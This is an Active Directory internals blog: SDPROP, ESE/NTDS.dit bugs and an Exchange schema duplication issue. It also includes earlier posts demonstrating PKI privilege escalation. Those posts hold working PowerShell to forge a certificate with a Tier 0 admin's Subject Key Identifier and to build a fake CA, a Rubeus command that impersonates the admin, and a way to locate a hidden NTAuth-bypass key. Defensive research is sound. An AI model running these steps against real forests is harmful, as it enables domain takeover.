Inside Active Directory: Misconceptions, Myths and Bugs (Part 1) – SDP

The Hybrid Identity Protection Conference (HIP) Europe 2026 in Frankfurt took place last week and I presented my session “Inside Active Directory: Misconceptions, Myths and Bugs”

The session is now available online: Inside Active Directory: Misconceptions, Myths, and Bugs

I would like to start to summarize the first subject I covered in the session – the Security Descriptor Propagation Daemon (SDP) also known as SDPROP. It’s been a misconception for a long time that SDPROP would have been a process/task or in anyway related to AdminSDHolder – it’s NOT other than AdminSDHolder eventually would be one of many consumer of SDPROP e.g. making a change to an objects ntSecurityDescriptor attribute (Modify an objects securityDescriptor)

Here a write up on the subject even on microsoft.com that is completely wrong mixing up AdminSDHolder and SDPROP:
Appendix C: Protected Accounts and Groups in Active Directory | Microsoft Learn

There are 100+ articles, blog posts and presentations that have got this wrong over the years, but I want to highlight a write up that describes AdminSDHolder very well: AdminSDHolder: Misconceptions, Misconfigurations, and Myths – SpecterOps – all credits to Jim Sykora for this write up.

You can also see that I mention this already on this blog in the “How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 3” post from 2012.

As my session this post will focus solidly on what SDPROP is responsible for and I will try to cover how it works.

SDPROP runs independently on each DC (Yes, even RODCs) and are responsible for the following:

  • Propagates inheritable ACEs in an SD down the tree and merge the SD with parent SD
  • Fix up the Ancestry in the Active Directory database (DIT)
    • ResetRDN (This is cause a index is changed used to enumerate children)
    • ResetDN
    • Lost parent in replication conflict
    • Conflict between reference phantom and structural phantom
  • Patches GUID-less objects if they have a SID

I did a demo in the session where I used SDPROP to patch up a GUID-less object, on a functional domain controller there should be no need to invoke SDPROP manually, but it can be trigged using a RootDSE Modify Operation – fixupInheritance.

Warning 1:
If you need to make a GUID-less object for testing purposes, you can make one in a dedicated test forest, DO NOT ATTEMPT to create a GUID-less object in a production forest.

Warning 2:
SDPROP can only patch GUID-less object if the object has a SID so this can only be done against a security principal – this is because the GUID is calculated based on the SID – Why is that? Because SDPROP runs independently on each domain controller and they must be able to set the very same GUID.

Create GUID-less object
dn:
changetype: modify
add: schemaUpgradeInProgress
schemaUpgradeInProgress: 1
-

dn:CN=ULF,OU=GUIDLess,DC=dstest,DC=chrisse,DC=com
changetype: modify
delete: objectGUID
-

If you want to enqueue a propagation for the entire tree, this can be done by setting ‘fixupInheritance’ to ‘1’, don’t do this in a production forest unless you know what you’re doing.

EnqueuePropagation for the entire tree
 dn:
 changetype: modify
 add: fixupInheritance
 fixupInheritance: 1
 -

There is also a possibility to Invoke the SDPROP to work ona specific object, however the object must be identified by DNT. For the concept about DNTs please see – “How the Active Directory – Data Store Really Works (Inside NTDS.dit) – Part 2

To find an objects DNT without the need to dump the entire DIT, there is since Windows Server 2012 another RootDSE Modify Operation – ‘dumpReferences’ that can be used to translate between DN and DNT for objects. (This is due to the fact that all objects (not phantoms) are keeping a reference to them self by the DN attribute)

Dump References for DN
 dn:
 changetype: modify 
 add: dumpReferences 
 dumpReferences: CN=ULF,OU=GUIDLess,DC=dstest,DC=chrisse,DC=com
 -

On the targeted domain controller you will get a text file within the same location as your Active Directory database (NTDS.dit) file, for example C:\Windows\NTDS\ named ntds.ref.dmp – the content should look like.

ntds.ref.dmp
Non-linked references to CN=ULF,OU=GUIDLess,DC=dstest,DC=chrisse,DC=com

DNT	Attribute(s)
5559	distinguishedName

Ones we have obtained the DNT of the object using the self-reference from the DN attribute, we can proceed and trigger SDPROP up-on that specific object using it’s DNT.

EnqueuePropagation for specifc object using DNT
 dn:
 changetype: modify
 add: fixupInheritance
 fixupInheritance: dnt:5559
 -

if the object was GUID less you should now see that it has a GUID assigned to it again, also the domain controller should have logged this:

Get GUID fix event
Get-WinEvent -LogName 'Directory Service' -MaxEvents 10 | Where-Object {$_.id -eq '2084'} | ft -Property Message -Wrap

This pretty much covers what I did show in the presentation, not let’s deep dive into SDPROP and look at how it works (something you can’t do in a 40 min session)

Implementation in the Active Directory database (NTDS.DIT) – SDPROP implements the following table: sdproptable

Column NameDescriptionIntroduced
order_colThis is the primary keyWindows 2000
begindnt_colThis is the DNT the propagation begins atWindows 2000
trimmable_colIndicates if this propagation can be merged with another propagationWindows 2000
clientid_colThe thread that has enqueued the propagation, if enqueued by the SDPROP thread can the client id would be 0xFFFFFFFF, in all other cases it would be the thread state client id.Windows 2000
flags_colThis column holds a set of flags, or no flags at allWindows Server 2003
checkpoint_colThis column contains list of DNT’s (containers) and children to process, as well a list of deadends if the propagation encountered any issues.

Note: the duration of the propagation must be long enough for a checkpoint to be saved.
Windows Server 2003
Note: The format changes in SP1
unsafe_ancestors_colif the propagation hasn’t finished and one or more objects have changed their parent- child relation, this hasn’t yet been reflected in the ancestors_col and therefor a list of “unsafe” ancestors have been saved, that would result in an eventual false-positive parent-child relation.

Note: This column is multi-valued and contains each DNT as it’s own value, reading all iTagSequence values is require to get the full list of DNTs

Note: The last DNT in the DNT’s list must match the DNT of the ‘begindnt_col’
Windows Server 2008

Here is a screen of how the “sdproptable” looks like when dumped with ESEDump

So is there a way to read the data out of the “sdproptable” from the “outside” using LDAP or any other APIs? Yes, sort of.

You can use the RootDSE attribute “pendingPropagations” as documented here – 3.1.1.3.2.15 pendingPropagations

However this can only retrieve any pending propagations that was caused or enqueued by the same thread as the current LDAP connection, that would match the threads id in the “clientid_col”

The “dSCorePropagationData” none-replicated attribute and it’s relation to SDPROP

The “dSCorePropagationData” get’s updated by SDPROP with timestamps when SDPROP is working on the object and a set of flags associated with the stamps or the object/phantom.

Since Windows Server 2008 a propagation is always enqueued even if the SD hasn’t changed (is bitwise equal to the already existing SD) unless the 14th bit of the dSHeuristics is set aka fDontPropagateOnNoChangeUpdate – as documented here – 6.1.1.2.4.1.2 dSHeuristics -as this is FALSE by default on Windows Server 2008 and later a timestamp is written into “dSCorePropagationData” even if the SD didn’t change.

This attribute has the syntax String(Generalized-Time) – and is multi-valued, where the first value holds the flags and the other values holds a maximum of 4 timestamps, the following flags can be associated with each timestamp or object:
SDP_NEW_SD = 1
SDP_NEW_ANCESTORS = 2
SDP_TO_LEAVES = 4
SDP_ANCESTRY_INCONSISTENT_IN_SUBTREE = 0x08
SDP_ANCESTRY_BEING_UPDATED_IN_SUBTREE = 0x10

if there is a need to write a 5th timestamp into the “dSCorePropagationData” attribute the 2th value is overwritten together with it’s corresponding flags.

You can view this attribute using LDP, it decodes the timestamps and the flags, but do not pair the flags with the time stamps

Looking at the same object using ESEDump:

The flags:
SDP_ANCESTRY_INCONSISTENT_IN_SUBTREE | SDP_ANCESTRY_BEING_UPDATED_IN_SUBTREE signal to Active Directory query optimization code that the ancestors index isn’t safe to use for subtree searches as the SDPROP is working on brining it to a consistent state and that it might would generate false positives.

Security Descriptor (SD) – Single Instance Storage (SIS) in the Active Directory aatabase (NTDS.dit)

It’s time to go into the full possible parameters of the RootDSE modify operation ‘fixupInheritance’ – but before we can do that, we need to understand – single instance storage of security descriptors in the Active Directory database (NTDS.dit) and how it was implemented and introduced with Windows Server 2003.

Before the introduction of the “sd_table” every SD was stored on each object’s row within the “datatable” – directly in the “ATTp131353 / nTSecurityDescriptor” column.

Once the “sd_table” was introduced in Windows Server 2003, SDs was MD5-hased and placed in the “sd_table” instead of the “datatable” – leaving only a reference in the “datatable” pointing to the row storing the SD in the “sd_table”, if a SD to be inserted into the “sd_table” already existed as an existing – already stored SD, that row was referenced instead.

This is of course much more effective – saves space up to 40% according to How to upgrade Windows 2000 domain controllers to Windows Server 2003 – Windows Server | Microsoft Learn, and gives more room for other data to be stored on the row in the “datatable” representing the object or phantom.

So why did we have to touch this to understand more parameters of the RootDSE modify operation ‘fixupInheritance’?

In [MS-ADTS] 3.1.1.3.3.10 fixupInheritance – the following is documented:

In Windows Server 2003 operating system and later, setting the fixupInheritance attribute to the special values “forceupdate” and “downgrade” has effects outside the state model.

The “downgrade” have the effect that all SDs are moved off the “sd_table” and put back into the “datatable” onto each object or phantoms row, as it was in a Windows 2000 style DIT 🙂

So in a fairly modern Active Directory database (NTDS.dit) aka post-Windows 2000 Server – it will look like this for the “ATTp131353 / nTSecurityDescriptor” in the “datatable”

If we look up the SDID reference in the “sd_table” we will find the actual SD

Warning: Do not test or perform this operation is a production environment

Let’s try the RootDSE modify operation ‘fixupInheritance’ with the parameter set to “downgrade”

Force SDs back into the datatable
 dn:
 changetype: modify
 add: fixupInheritance
 fixupInheritance: downgrade
 -

Let’s have a look again at the same object in the “datatable”

Same SD but now stored directly in the “datatable” – I don’t expect you to compare the SDs but they do match 🙂

I don’t think I need to go into what the “forceupdate” parameter is doing.

Some old but good real-word scenarios related to SDPROP and the Active Directory database

I presented this at my first HiP Conf in 2017 in my session – “Inside the Active Directory database (NTDS.DIT)” – That is almost 10 years ago.

Case 1

The funny thing here is a added the -GetRecordSize into ESEDump to troubleshoot this very issue, it calls into the JetGetRecordSize function of the ESENT API.

Now in Windows Server 2025 this is available as an attribute natively – msDS-JetGetRecordSize3 that calls into a later version of JetGetRecordSize than me, JetRecordSize3 don’t seem to be publicly documented yet.

This is how it looks like in ESEDump

Case 2

The SDID reference between the “datatable” and the “sd_table” broke, the SDID stored for that object in the “datatable” pointed to a none-existent row in the “sd_table”

By the way, the database semantic checker would have patched up the GUID-less object as well, but that would have required to take the DC offline.

LDP.exe fails on me – crash dump analyze and resolution

For some time LDP.exe just crash for me on my Windows 11 laptop, I can connect and bind successfully, but as soon as I want to view an object or tree, ldp.exe just crash.

So I decided to capture and analyze the crash dump

So what is going on here? The function takes the following parameters: BerEncode(CtrlInfo *ci, PBERVAL pBerVal)

CtrlInfo struct holds some info about an LDAP control.
pBerVal is just a LDAP_BERVAL (winldap.h) – Win32 apps | Microsoft Learn

This lead me to check my controls loaded in ldp.exe – what is that?

Something I’ve never entered at least, that is for sure? But how did it end up there?

It turned out that if, “HKEY_CURRENT_USER\Software\Microsoft\Ldp\Controls\ControlCount” get’s out of sync and contains a value that’s above the numbers of controls saved, it adds this kind of garbage data and will cause ldp.exe to crash!

Debugging something that isn’t an issue in a ntds.dit

I tried to dump a NTDS.dit from a RODC with ESEDump – something I haven’t done in years and just stumbled up on the fact that i got NDNC’s (None-Domain Naming Contexts) appearing twice in ‘msDS-HasInstantiatedNCs’ – ESEDump did work as expected but I started to question my self if my code walking the range in the “link_table” worked correctly.

I then thought that this must have something to do with the fact that this RODC is promoted from IFM. Let’s have a look on that attribute with repadmin.exe

Yep, I but those are my two ‘duplicated’ NDNCs – but why? I wrote two articles in the past about how IFM is working and did almost cover this but missed it in the first part as it solidly was focusing on Windows Server 2003 – it says:

Sourcing NDNCs with Windows Server 2003 is only supported by Windows Server 2003 SP1 or later under the following conditions:

  • Both the DC your souring the IFM from must be running at least Windows Server 2003 SP1 or later and as well the machine intending to become a DC using the source IFM.
  • The forest functional level (FFL) has to be: Windows Server 2003 (Pre-Windows Server 2003 FFL adding replicas to NCs has to be done on the Domain Naming Master – FSMO)
    Note: The promotion completes with the sourced IFM even if the forest functional level (FFL) is less than Windows Server 2003 but NDNCs aren’t sourced from the IFM and the following will happen:

The DomainDNSZones and ForestDNSZones are begin replicated in again over the wire using normal replication, as the promoted DC (Sourced from IFM) hosts the DNS Service

I forgot to mention that it’s not supported to keep any NDNCs in the DIT for the Red-Only Domain Controller IFM case – those get wacked and replicated back in again.

Link to the article How install from media (IFM) really works (Part 1) – Christoffer Andersson

The solution here if I really only want to get PRESENT links would be to change incides over the “link_table” to the “present” ones depending on fwd o back links, the Recycle-Bin was not enabled in this environment.

C#
EseHelper.JetSetCurrentIndex(sesid, tableid, /*"link_index"*/ "link_present_index")
EseHelper.JetSetCurrentIndex(sesid, tableid, /*"backlink_index"*/ "backlink_present_index")

8k page size DITs on Windows Server 2025 and NTDSUTIL might make your DC unbootable

All DIT’s on Windows Server 2025 isn’t 32k page size (Yes I know – I did say that in my last blog post), there is two exceptions, 1: the IPU case aka In-place-upgrade of a pre-Windows Server 2025 DC, in that case the DB will remain as-is in terms of page size.

You can verify the actual page size using a new attribute msDS-JetDBPageSize to determine the page size of a Windows Server 2025 DSA.

This clearly show us that the page size of the one and only DSA running Windows Server 2025 is 8k – this is because the DIT comes from a an IPU’ed aka in-place-upgraded Windows Server 2022 DC.

Let’s have a look with esentutil /m C:\Windows\NTDS\NTDS.dit

For sure the DIT is 8k page size, we can also validate by it’s DB Signature that it was created back in 2017, we can compare with the Distribution DIT that is 32k page size and created in 2023 – more on the Distribution DIT can be found here.

So how do we get to 32k page size on this DC? The answer is you can’t unless you demote and re-promote it. You can get to Windows Server 2025 DFL and FFL – but you can’t enable the “Database 32k pages feature”

There is is a 2:nd way to get up additional DCs running Windows Server 2025 with 8k page size DIT’s.

If you produce IFM media of a Windows Server 2025 DC with 8k page size – the Windows Server 2025 DCs you promote using that IFM media also going to have 8k page size of their DITs.

IPU-DC-02 is promoted using a IFM produced off IPU-DC-01 that once was IPU:ed (In-place-upgraded) from Windows Server 2022.

Extensible Storage Engine – ESENT and the Engine Format Version

Some where after Windows 19H1 version 1903 – released in May 2019 and within Windows 20H1 version 2004 – ESENT seem to have got support for something called “EngineFormatVersion” that enables specific features depending on the ESE Engine version – by default if a ESE DB is attached on a more recent engine than the ESE DB was initially created on, it and it’s logs are upgraded to the current ESE Engine version, that might break backwards compatibility to be able to attach the ESE DB by a older version of the ESE Engine (older version of the operating system with an ESE Engine only supporting certain EngineFormatVersions) – this is by default aka:

ESENT.h
#define JET_efvUseEngineDefault             (0x40000001)    //  Instructs the engine to use the maximal default supported Engine Format Version. (default)

How ever the Active Directory DSA (ntdsai.dll) have decided to support databases (DIT’s) that don’t even support the efv (Engine Format Version) by setting a hard version of:

ESENT.h
#define JET_efvWindows19H1Rtm                   8920        //  Last pre-efv version, shipped in Windows 10 until 19H1 release.

This sort of came up and got awareness to the outside world by Michael Grafnetter when someone used his incredible tool dsinternals to attach to a DIT and the default – JET_efvUseEngineDefault was used, it upgraded the DIT and when the Active Directory DSA (ntsdsai.dll) would try to attach to it again it would have a efv (Engine Format Version) that was way head of it’s hardcoded JET_efvWindows19H1Rtm

Ops the DIT can no longer be used by the Active Directory DSA (ntsdsai.dll).

ESENT error -623 is JET_errEngineFormatVersionSpecifiedTooLowForDatabaseVersion

This was resolved by setting the JetSetSystemParameter JET_paramEngineFormatVersion to JET_efvUsePersistedFormat before attaching the database – Michael figured out that this was how the esentutil would do it. DsIntetrnals got updated and I updated my ESEDump tool pretty much the same way:

ESEDump source
if (DbInfoMisc.dwBuildNumber >= 20348)
    err = E.Check(EseHelper.JetSetSystemParameter(ref instance, EseHelper.JET_sesidNil, new IntPtr(EseHelper.JET_paramEngineFormatVersion), new IntPtr(EseHelper.JET_efvUsePersistedFormat), null));

What happened to NTDSUTIL.exe and 8k size DITs?

For some reason if you’re using ntdsutil.exe against a 8k size DIT on Windows Server 2025 and it attaches your DIT – It’s going to destroy your dit and your DC will never boot again – guess what? It upgrades your DB beyond efv (Engine Fromat Version) 8920 (JET_efvWindows19H1Rtm) – This is NOT good and is another bug in Windows Server 2025.

If you’re on Windows Server 2025 with 8k page size DITs – stay away from ntdsutil.exe and especially the file context, it will destroy your DIT. Or to be honest stay away from 8k page size DITs on Windows Server 2025 to being with.

Update 2025-11-07: Microsoft responded quickly and seriously to this issue and a fix is already on it’s way, also note that the DIT is not corrupted in anyway so that data is NOT lost, it’s just upgraded to a later version and the DSA is refusing to attach the DIT as Active Directory don’t support that ESE evf (Engine Fromat Version)

Active Directory – 32k pages DIT and the JET_bitSetUniqueMultiValues issue (The real Exchange Schema Issue)

So after HIPConf 25 and meeting some people from the AD team – having good discussions, I thought it would be nice to deep dive into what I love the most – Active Directory and it’s internal workings, I decided to dig into this issue that has been posted a lot to me and people has asked what I think about it: Active Directory schema extension issue if you use a Windows Server 2025 schema master role | Microsoft Community Hub

So what is going on here – a bad exchange schema upgrade that would cause replication to fail? At first you can think that would be the case – it’s NOT according to me, but I would hold on that the exchange schema upgrade do something bad [1] – let’s get back to that later.

So when can this disaster strike – if you’re running Exchange adprep to extend your Active Directory schema for the first time, aka the forest had no previous versions of Exchange schema extensions – nope nothing happens regardless of the versions of your DCs, Including the Schema FSMO – running Windows Server 2025.

If you run adprep and ALREADY have extended your schema for Exchange previously and the Schema FSMO would be running Windows Server 2025 – then you would run into issues – But what really happens?

Attributes with the syntax 2.5.5.2 aka String(Object-Identifier) suddenly takes duplicates – here it’s time to tell what exchange is doing bad [1] – Exchange adprep never check if a value is already present in those attributes, instead on each update (CU/Release) it’s trying to add the same value again, relaying that AD throw’s them out with ATT_OR_VALUE_EXISTS – below we can see how that works when the Schema – FSMO is held by a Windows Server 2008 R2

But this will be allowed on Windows Server 2025?

That is not good – and it will break Active Directory replication on the receiving end if it’s a down-level DC (e.g. not Windows Server 2025 [2]) the update will only apply one of the duplicate e.g. the duplicate detection will work, so if we’re looking up our example class here ‘Address-Book-Container’ between the schema FSMO and another DC.

Why will it not break replication to other Windows Server 2025 DCs? Well they suffer from the same duplication bug – or do they really? [2]

This is how it would look like on a down-level DC (e.g. not Windows Server 2025)

And of course it’s a schema mismatch when the definition of a class is different between two replocas, one with two values for the attribute auxiliaryClass (2) country;country while the other only has auxiliaryClass (1) country;

Well let’s go a step beyond this and leave Exchange for a while, let’s add our own attr (chDsObjid) with the syntax 2.5.5.2 aka String(Object-Identifier)

Windows Server 2025 DC

Windows Server 2022 DC

So the same behavior – however this will not cause a schema mismatch and break replication, only bring inconsistency.

So what is wrong here, something most be wrong with Active Directory’s duplication logic on Windows Server 2025 [2] or?

Let’s again look at how it should work – we should be thrown out if where trying to add a value that already exists on a attribute with syntax 2.5.5.2 aka String(Object-Identifier)

We are and it works as expected on down-level DC (e.g. not Windows Server 2025) – We get a DSID – that can give us a pointer to where this is blocked in the ds source. I happen to know that AD has it’s own detection for duplicates values for certain syntaxes, but not for 2.5.5.2 aka String(Object-Identifier) – here Active Directory solidly relays on Extensible Storage Engine – ESENT / Jet for value duplication detection.

JetSetColumn is called with grbit JET_bitSetUniqueMultiValues = 0x00000080 – this seems to fail on Windows Server 2025? [2]

I felt I had to try out this my self on the Extensible Storage Engine – ESE level so what the heck how hard can it be to modify ESEDump to do writes to the DIT:

So let’s try this and see if we’re thrown out by ESE – if we first try with a Windows Server 2022 DIT (8k)

Yes that works as expected, let’s try the very same code now on a Windows Server 2025 DIT (32k)

Ops – Something must be wrong within Extensible Storage Engine -ESE (ESENT.dll) – we’re getting through here even if we’re calling JetSetColumn with grbit JET_bitSetUniqueMultiValues and a value that is already present in the column.

But let’s try a DIT from Windows Server 2022 (8k) on Windows Server 2025 🙂 We’re thrown out with ESENT error: A duplicate value was detected on a unique multi-valued column.

But wait wasn’t Windows Server 2025 broken or had some defect in ESENT.dll?

My understanding is that this has to do with the page size of the NTDS.dit database and that JET_bitSetUniqueMultiValues don’t work correctly on 32k pages DBs and has never done, no matter of the underlaying operating system, it just happen to be that on Windows Server 2025 all NTDS.dit databases are 32k pages.

But wait shouldn’t the database be 32k pages first when the “Database 32k pages optional feature” has been enabled? No, again all NTDS.dit’s on Windows Server 2025 is 32k page by default, the “Database 32k pages optional feature” only let go of restrictions enforced to be able to co-exist with downl-level replicas (e.g. none Windows Server 2025 DCs)

[2] The issue has nothing to do with Active Directory – it seems to be a bug in Extensible Storage Engine – ESENT (ESENT.dll)

Summary

It took me a day to figure out and test this, including writing a version of ESEDump that could prove this. Exchange should look for the values they are trying to add and not relay on Active Directory throwing an error that the value already exists.

How can you find effected attributes, run the following AD query against your Schema NC:

PowerShell
Get-ADObject -SearchBase (Get-ADRootDSE).schemaNamingContext -LDAPFilter "(&(attributeSyntax=2.5.5.2)(isSingleValued=FALSE))"

It is possible to fix this if you run into it – without during a forest recovery. Please contact Microsoft Support and they will help you to get back in a supported manner, I know how to get out of this as well – but I’m not Microsoft nor do I work for Microsoft, I’m just a Active Directory geek that like to figure out how things work, or not work.

When your Enterprise PKI becomes one of your enemies (Part 8)

So the security updates for October has arrived and “AllowNtAuthPolicyBypass” registry key is now gone from kdcsvc.dll – All CAs that issue certificates to be used for PKINIT against Active Directory must now be trusted in NTAuth.

Please do not add CA’s to NTAuth that you don’t trust, as any one who can issue a certificate with subject of choice from those still can impersonate any user account within your forest e.g. a DA/EA and this is regardless of StrongCertificateBindingEnforcement and NTAuthEnforcement.

A good solution to keep NTAuth safe is NTAuthGuard by Carl Sörqvist.


Read more about the NTAuthGuard solution – how to set it up and get all the required content from Carl’s GitHub https://github.com/CarlSorqvist/PsCertTools/tree/main/NTAuthGuard

But as I use to say, there is always a secret key – as with “StrongCertificateBindingEnforcement” another key instead of “AllowNtAuthPolicyBypass” can be used to “unsupported so far I know” turn off the NTAuthEnforcement requirement. You will find it by using:

.\strings.exe -n 5 -o -f 671232 C:\Windows\system32\kdcsvc.dll

But do not use it, you will be subject to vulnerabilities, however this new regkey has two modes:

  1. if set to “0” it will just silently ignore if the CA is in NTAuth or not
  2. if set to “1” it will log Event 45 for KDC

By the way my session at HIPConf25 on this subject is now available online for everyone to watch:
Enterprise PKI Today: Friend or Foe? – Hip Conf

When your Enterprise PKI becomes one of your enemies (Part 7)

Hybrid Identity Protection (HIP) Conference 2025 is over and I presented on the Active Directory and PKI subject again: “Enterprise PKI Today: Friend or Foe”

Now available to watch online: Enterprise PKI Today: Friend or Foe? – Hip Conf

StrongCertificateBindingEnforcement vs NTAuthEnforcement

StrongCertificateBindingEnforcement has been mandatory since 10th of September 2025 with no supported way of doing a optout to Compatibility Mode. Enforcing this took over 3 years – and where still not done – while the ‘StrongCertificateBindingEnforcement’ registry key is gone from “kdcsvc.dll” with the September updates. However there is a new key available to still optout but that key is only intended for special cases and should NOT be used, but you can find it by string dumping the “kdcsvc.dll” at a specific offset.

.\strings.exe -n 5 -o -f 671232 C:\Windows\system32\kdcsvc.dll

Please be aware that the StrongCertificateBindingEnforcement only protect you from what it was designed to – the following:

  1. dNSHostName/servicePrincipalName computer owner abuse, Remove DNS SPNs from servicePrincipalName, steal DNS hostname of a DC, put it in your computer accounts dNSHostName attr and request a cert, auth (PKINIT) with the cert and you’re a DC.
  2. Overwrite userPrincipalName of user to be of target to hijack user account since the missing domain part does not violate an existing UPN
  3. Overwrite userPrincipalName of user to be @ of target to hijack machine account since machine accounts don’t have a UPN
  4. Delete userPrincipalName of user and overwrite sAMAccountName to be without a trailing $ to hijack a machine account

Note: 2-4 would require permissions to write to the ‘userPrincipalName’ attribute

It will NOT protect you from:

  1. CAs trusted in your forest where you don’t have a good security hygiene for issuance of certificates
    • If someone can issue a certificate with subject + sid they own that security principal in your Active Directory Forest.
    • Subject + SID in AltSubject is sadly enough – tag:microsoft.com,2022-09-14:sid:<value>
    • •If you’re using Authentication Mechanism Assurance (AMA) – you must control/prevent issuance with specific issuance policies.
  2. Bad certificate template hygiene
    • Supply in the request (SITR) should never be published on a CA trusted in NTAuth
    • Write access to certificate templates outside Tier 0 allows for SITR to be enabled.
  3. 3rd party/standalone CAs or RA’s/EA’s – you’re on your own to block the above.

NTAuthEnforcement

Since July the NTAuthEnforcement has been enabled by default, meaning that all CAs that issue certificates to be used for PKINIT must be trusted in NTAuth – this changes the picture.

Before this new requirement it was possible to be trusted for PKINIT even if the issuing CA was not trusted in NTAuth – if a strong mapping method was used using AltSecID (altSecurityIdentities). This is no longer possible after CVE-2025-26647 as X509SKI (Subject Key Identifier) for example was considered a strong mapping, but it is possible to create a certificate with a designated SKI (Subject Key Identifier) from any trusted CA – this becomes problematic as you could create a SKI (Subject Key Identifier) of an existing mapped user – a T0 administrator for example and become that security principal within the forest.

In my past post “When your Enterprise PKI becomes one of your enemies (Part 6)” i demonstrate how to – Create, Distribute and Force-Trust your own Fake CA within a forest to perform a T1 to T0 privilege escalation – at that time leverage Authentication Mechanism Assurance (AMA).

But let’s using CVE-2025-26647 instead, let’s say we found a T0 – “strongly” mapped with SKI (Subject Key Identifier) within the Active Directory forest.

Looking something like this:

Dn: CN=Carl Sörqvist (A0),OU=Tier0,DC=nttest,DC=chrisse,DC=com
accountExpires: 9223372036854775807 (never); 
altSecurityIdentities: X509:<SKI>C97FACAFD474A962253C5EF55E72ED712B788905; 

Given we have the private key for our fake CA available let’s create and sign a certificate with the same SKI (Subject Key Identifier)

Issue certificate with same SKI as exiting T0 admin
using namespace System.Security.Cryptography
using namespace System.Security.Cryptography.X509Certificates
Import-Module -Name CertRequestTools
$SKIExt = [X509SubjectKeyIdentifierExtension]::new("c97facafd474a962253c5ef55e72ed712b788905", $false)
$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()
$CRLDistInfo.Reset(1)
$CRLDistInfo.SetNameCount(0, 1)
$CRLDistInfo.SetNameEntry(0, 0, 7, "ldap:///CN=Chrisse Root CA,CN=NTTEST-CA-01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com?certificateRevocationList?base?objectClass=cRLDistributionPoint")
$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)
$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new("2.5.29.31", [Convert]::FromBase64String($CRLDistInfoB64), $false)

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO7 - casoski'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $CRLDistInfoExtManaged, $SKIExt
New-SelfSignedCertificate @params

We can now use this certificate to perform PKINIT and become “Carl Sörqvist (A0)”

cmd
rubeus asktgt /user:CASO /certificate:<HASH> /enctype:aes256 /createnetonly:C:\Windows\System32\cmd.exe /show

You can for now until the October patch wave arrive opt-out from the NTAuthEnforcement but then you would be vulnerable to the above “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc\AllowNtAuthPolicyBypass=1”

Summary

Same mitigation as presented before applies – make sure you have two enterprise issuing CAs where one of them isn’t trusted in NTAuth – this one can publish – Supply in the request (SITR) templates, while the other CA that is in NTAuth – Never should have any – Supply in the request (SITR) templates published. All and both Enterprise CAs must be managed from T0 this is very important, however they can issue certificates to lower tiers.

  • Strong Certificate Binding Enforcement protects against CVE-2022-34691, CVE-2022-26931 and CVE-2022-26923
    • It will NOT protect against bad security hygiene on our CAs, Templates or information within your certificates.
  • NTAuth requirement will protect against CVE-2025-26647 and eliminate all other paths to PKINIT that didn’t required NTAuth
    • Fake CA Scenario
    • AMA Abuse using altSecID from non-NTAuth CA

Note all my demos uses ‘CertRequestTools‘ from Carl Sörqvist and in this case also Rubeus from Will Schroeder.

When your Enterprise PKI becomes one of your enemies (Part 6)

Create, Distribute enforce Trust of a fake CA from T1 – PKINIT– altSecurityIdentities + AMA + Cert Publishers

Let’s assume that ‘Issuing CA 2’ here is managed from T1 and not trusted in ‘NTAuth’ – should not be a problem or?

In this scenario a Tier 1 administrator could logon to ‘Issuing CA 2’ become SYSTEM and acting as the machines security context.
Enterprise CAs are automatically added to the ‘Cert Publishers’ Group and that group is always given ‘Full Control’ to a Enterprise CAs ‘certificationAuthority’ object within ‘CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com’

This is unfortunately hardcoded into the installation of an Enterprise CA – But now to the interesting part what can you do if you’re member of ‘Cert Publishers’?

Well let’s create our own fake CA and a leaf certificate contain the AMA Issuance policy OID:

CreateFakeCA and Leaf without CRL
Import-Module -Name CertRequestTools
$CertPolicies = New-CertificatePoliciesExtension -Oid "2.5.29.32.0" 
$AmaExtension = New-CertificatePoliciesExtension -Oid "1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402"

$signer = New-SelfSignedCertificate -KeyExportPolicy Exportable `
 -CertStoreLocation Cert:\CurrentUser\My `
 -Subject "CN=Chrisse Root CA,DC=chrisse,DC=com" `
 -NotAfter (Get-Date).AddYears(1) `
 -HashAlgorithm sha256 `
 -KeyusageProperty All `
 -KeyUsage CertSign, CRLSign, DigitalSignature `
 -Extension $CertPolicies `
 -TextExtension @('2.5.29.37={text}1.3.6.1.4.1.311.10.12.1', '2.5.29.19={text}CA=1&pathlength=3')

 $params = @{
    Type = 'Custom'
    Subject = 'CN=DEMO5 - fakecaso1'
    #KeySpec = 'Signature'
    KeyExportPolicy = 'Exportable'
    KeyLength = 2048
    HashAlgorithm = 'sha256'
    NotAfter = (Get-Date).AddMonths(10)
    CertStoreLocation = 'Cert:\CurrentUser\My'
    Signer = $signer
    TextExtension = @(
     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',
     '2.5.29.17={text}upn=caso@nttest.chrisse.com')
    Extension =  $AmaExtension
}
New-SelfSignedCertificate @params
Export-Certificate -Cert $signer -FilePath FakeCA.cer

Find any user within the forest where you can write to the ‘altSecurityIdentities’ attribute

Set-AltSecurityIdentities
$cert  = ls Cert:\CurrentUser\my | where { $_.subject -eq "CN=DEMO5 - fakecaso1" }
.\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert

So we now have a CA ‘CN=Chrisse Root CA,DC=chrisse,DC=com’ and a certificate issued by the CA “CN=DEMO5 – fakecaso3” with the AMA Issuance OID. There is a reason why the CA is named “CN=Chrisse Root CA,DC=chrisse,DC=com” (The name of an already existing root CA within the forest – and that is because how certutil -dspublish will handle the CA certificate.
So now let’s become SYSTEM on ‘Issuing CA 2’ that’s by default member of the ‘Cert Publishers’ group – now let’s add the CA certificate to Active Directory using certutil.

cmd
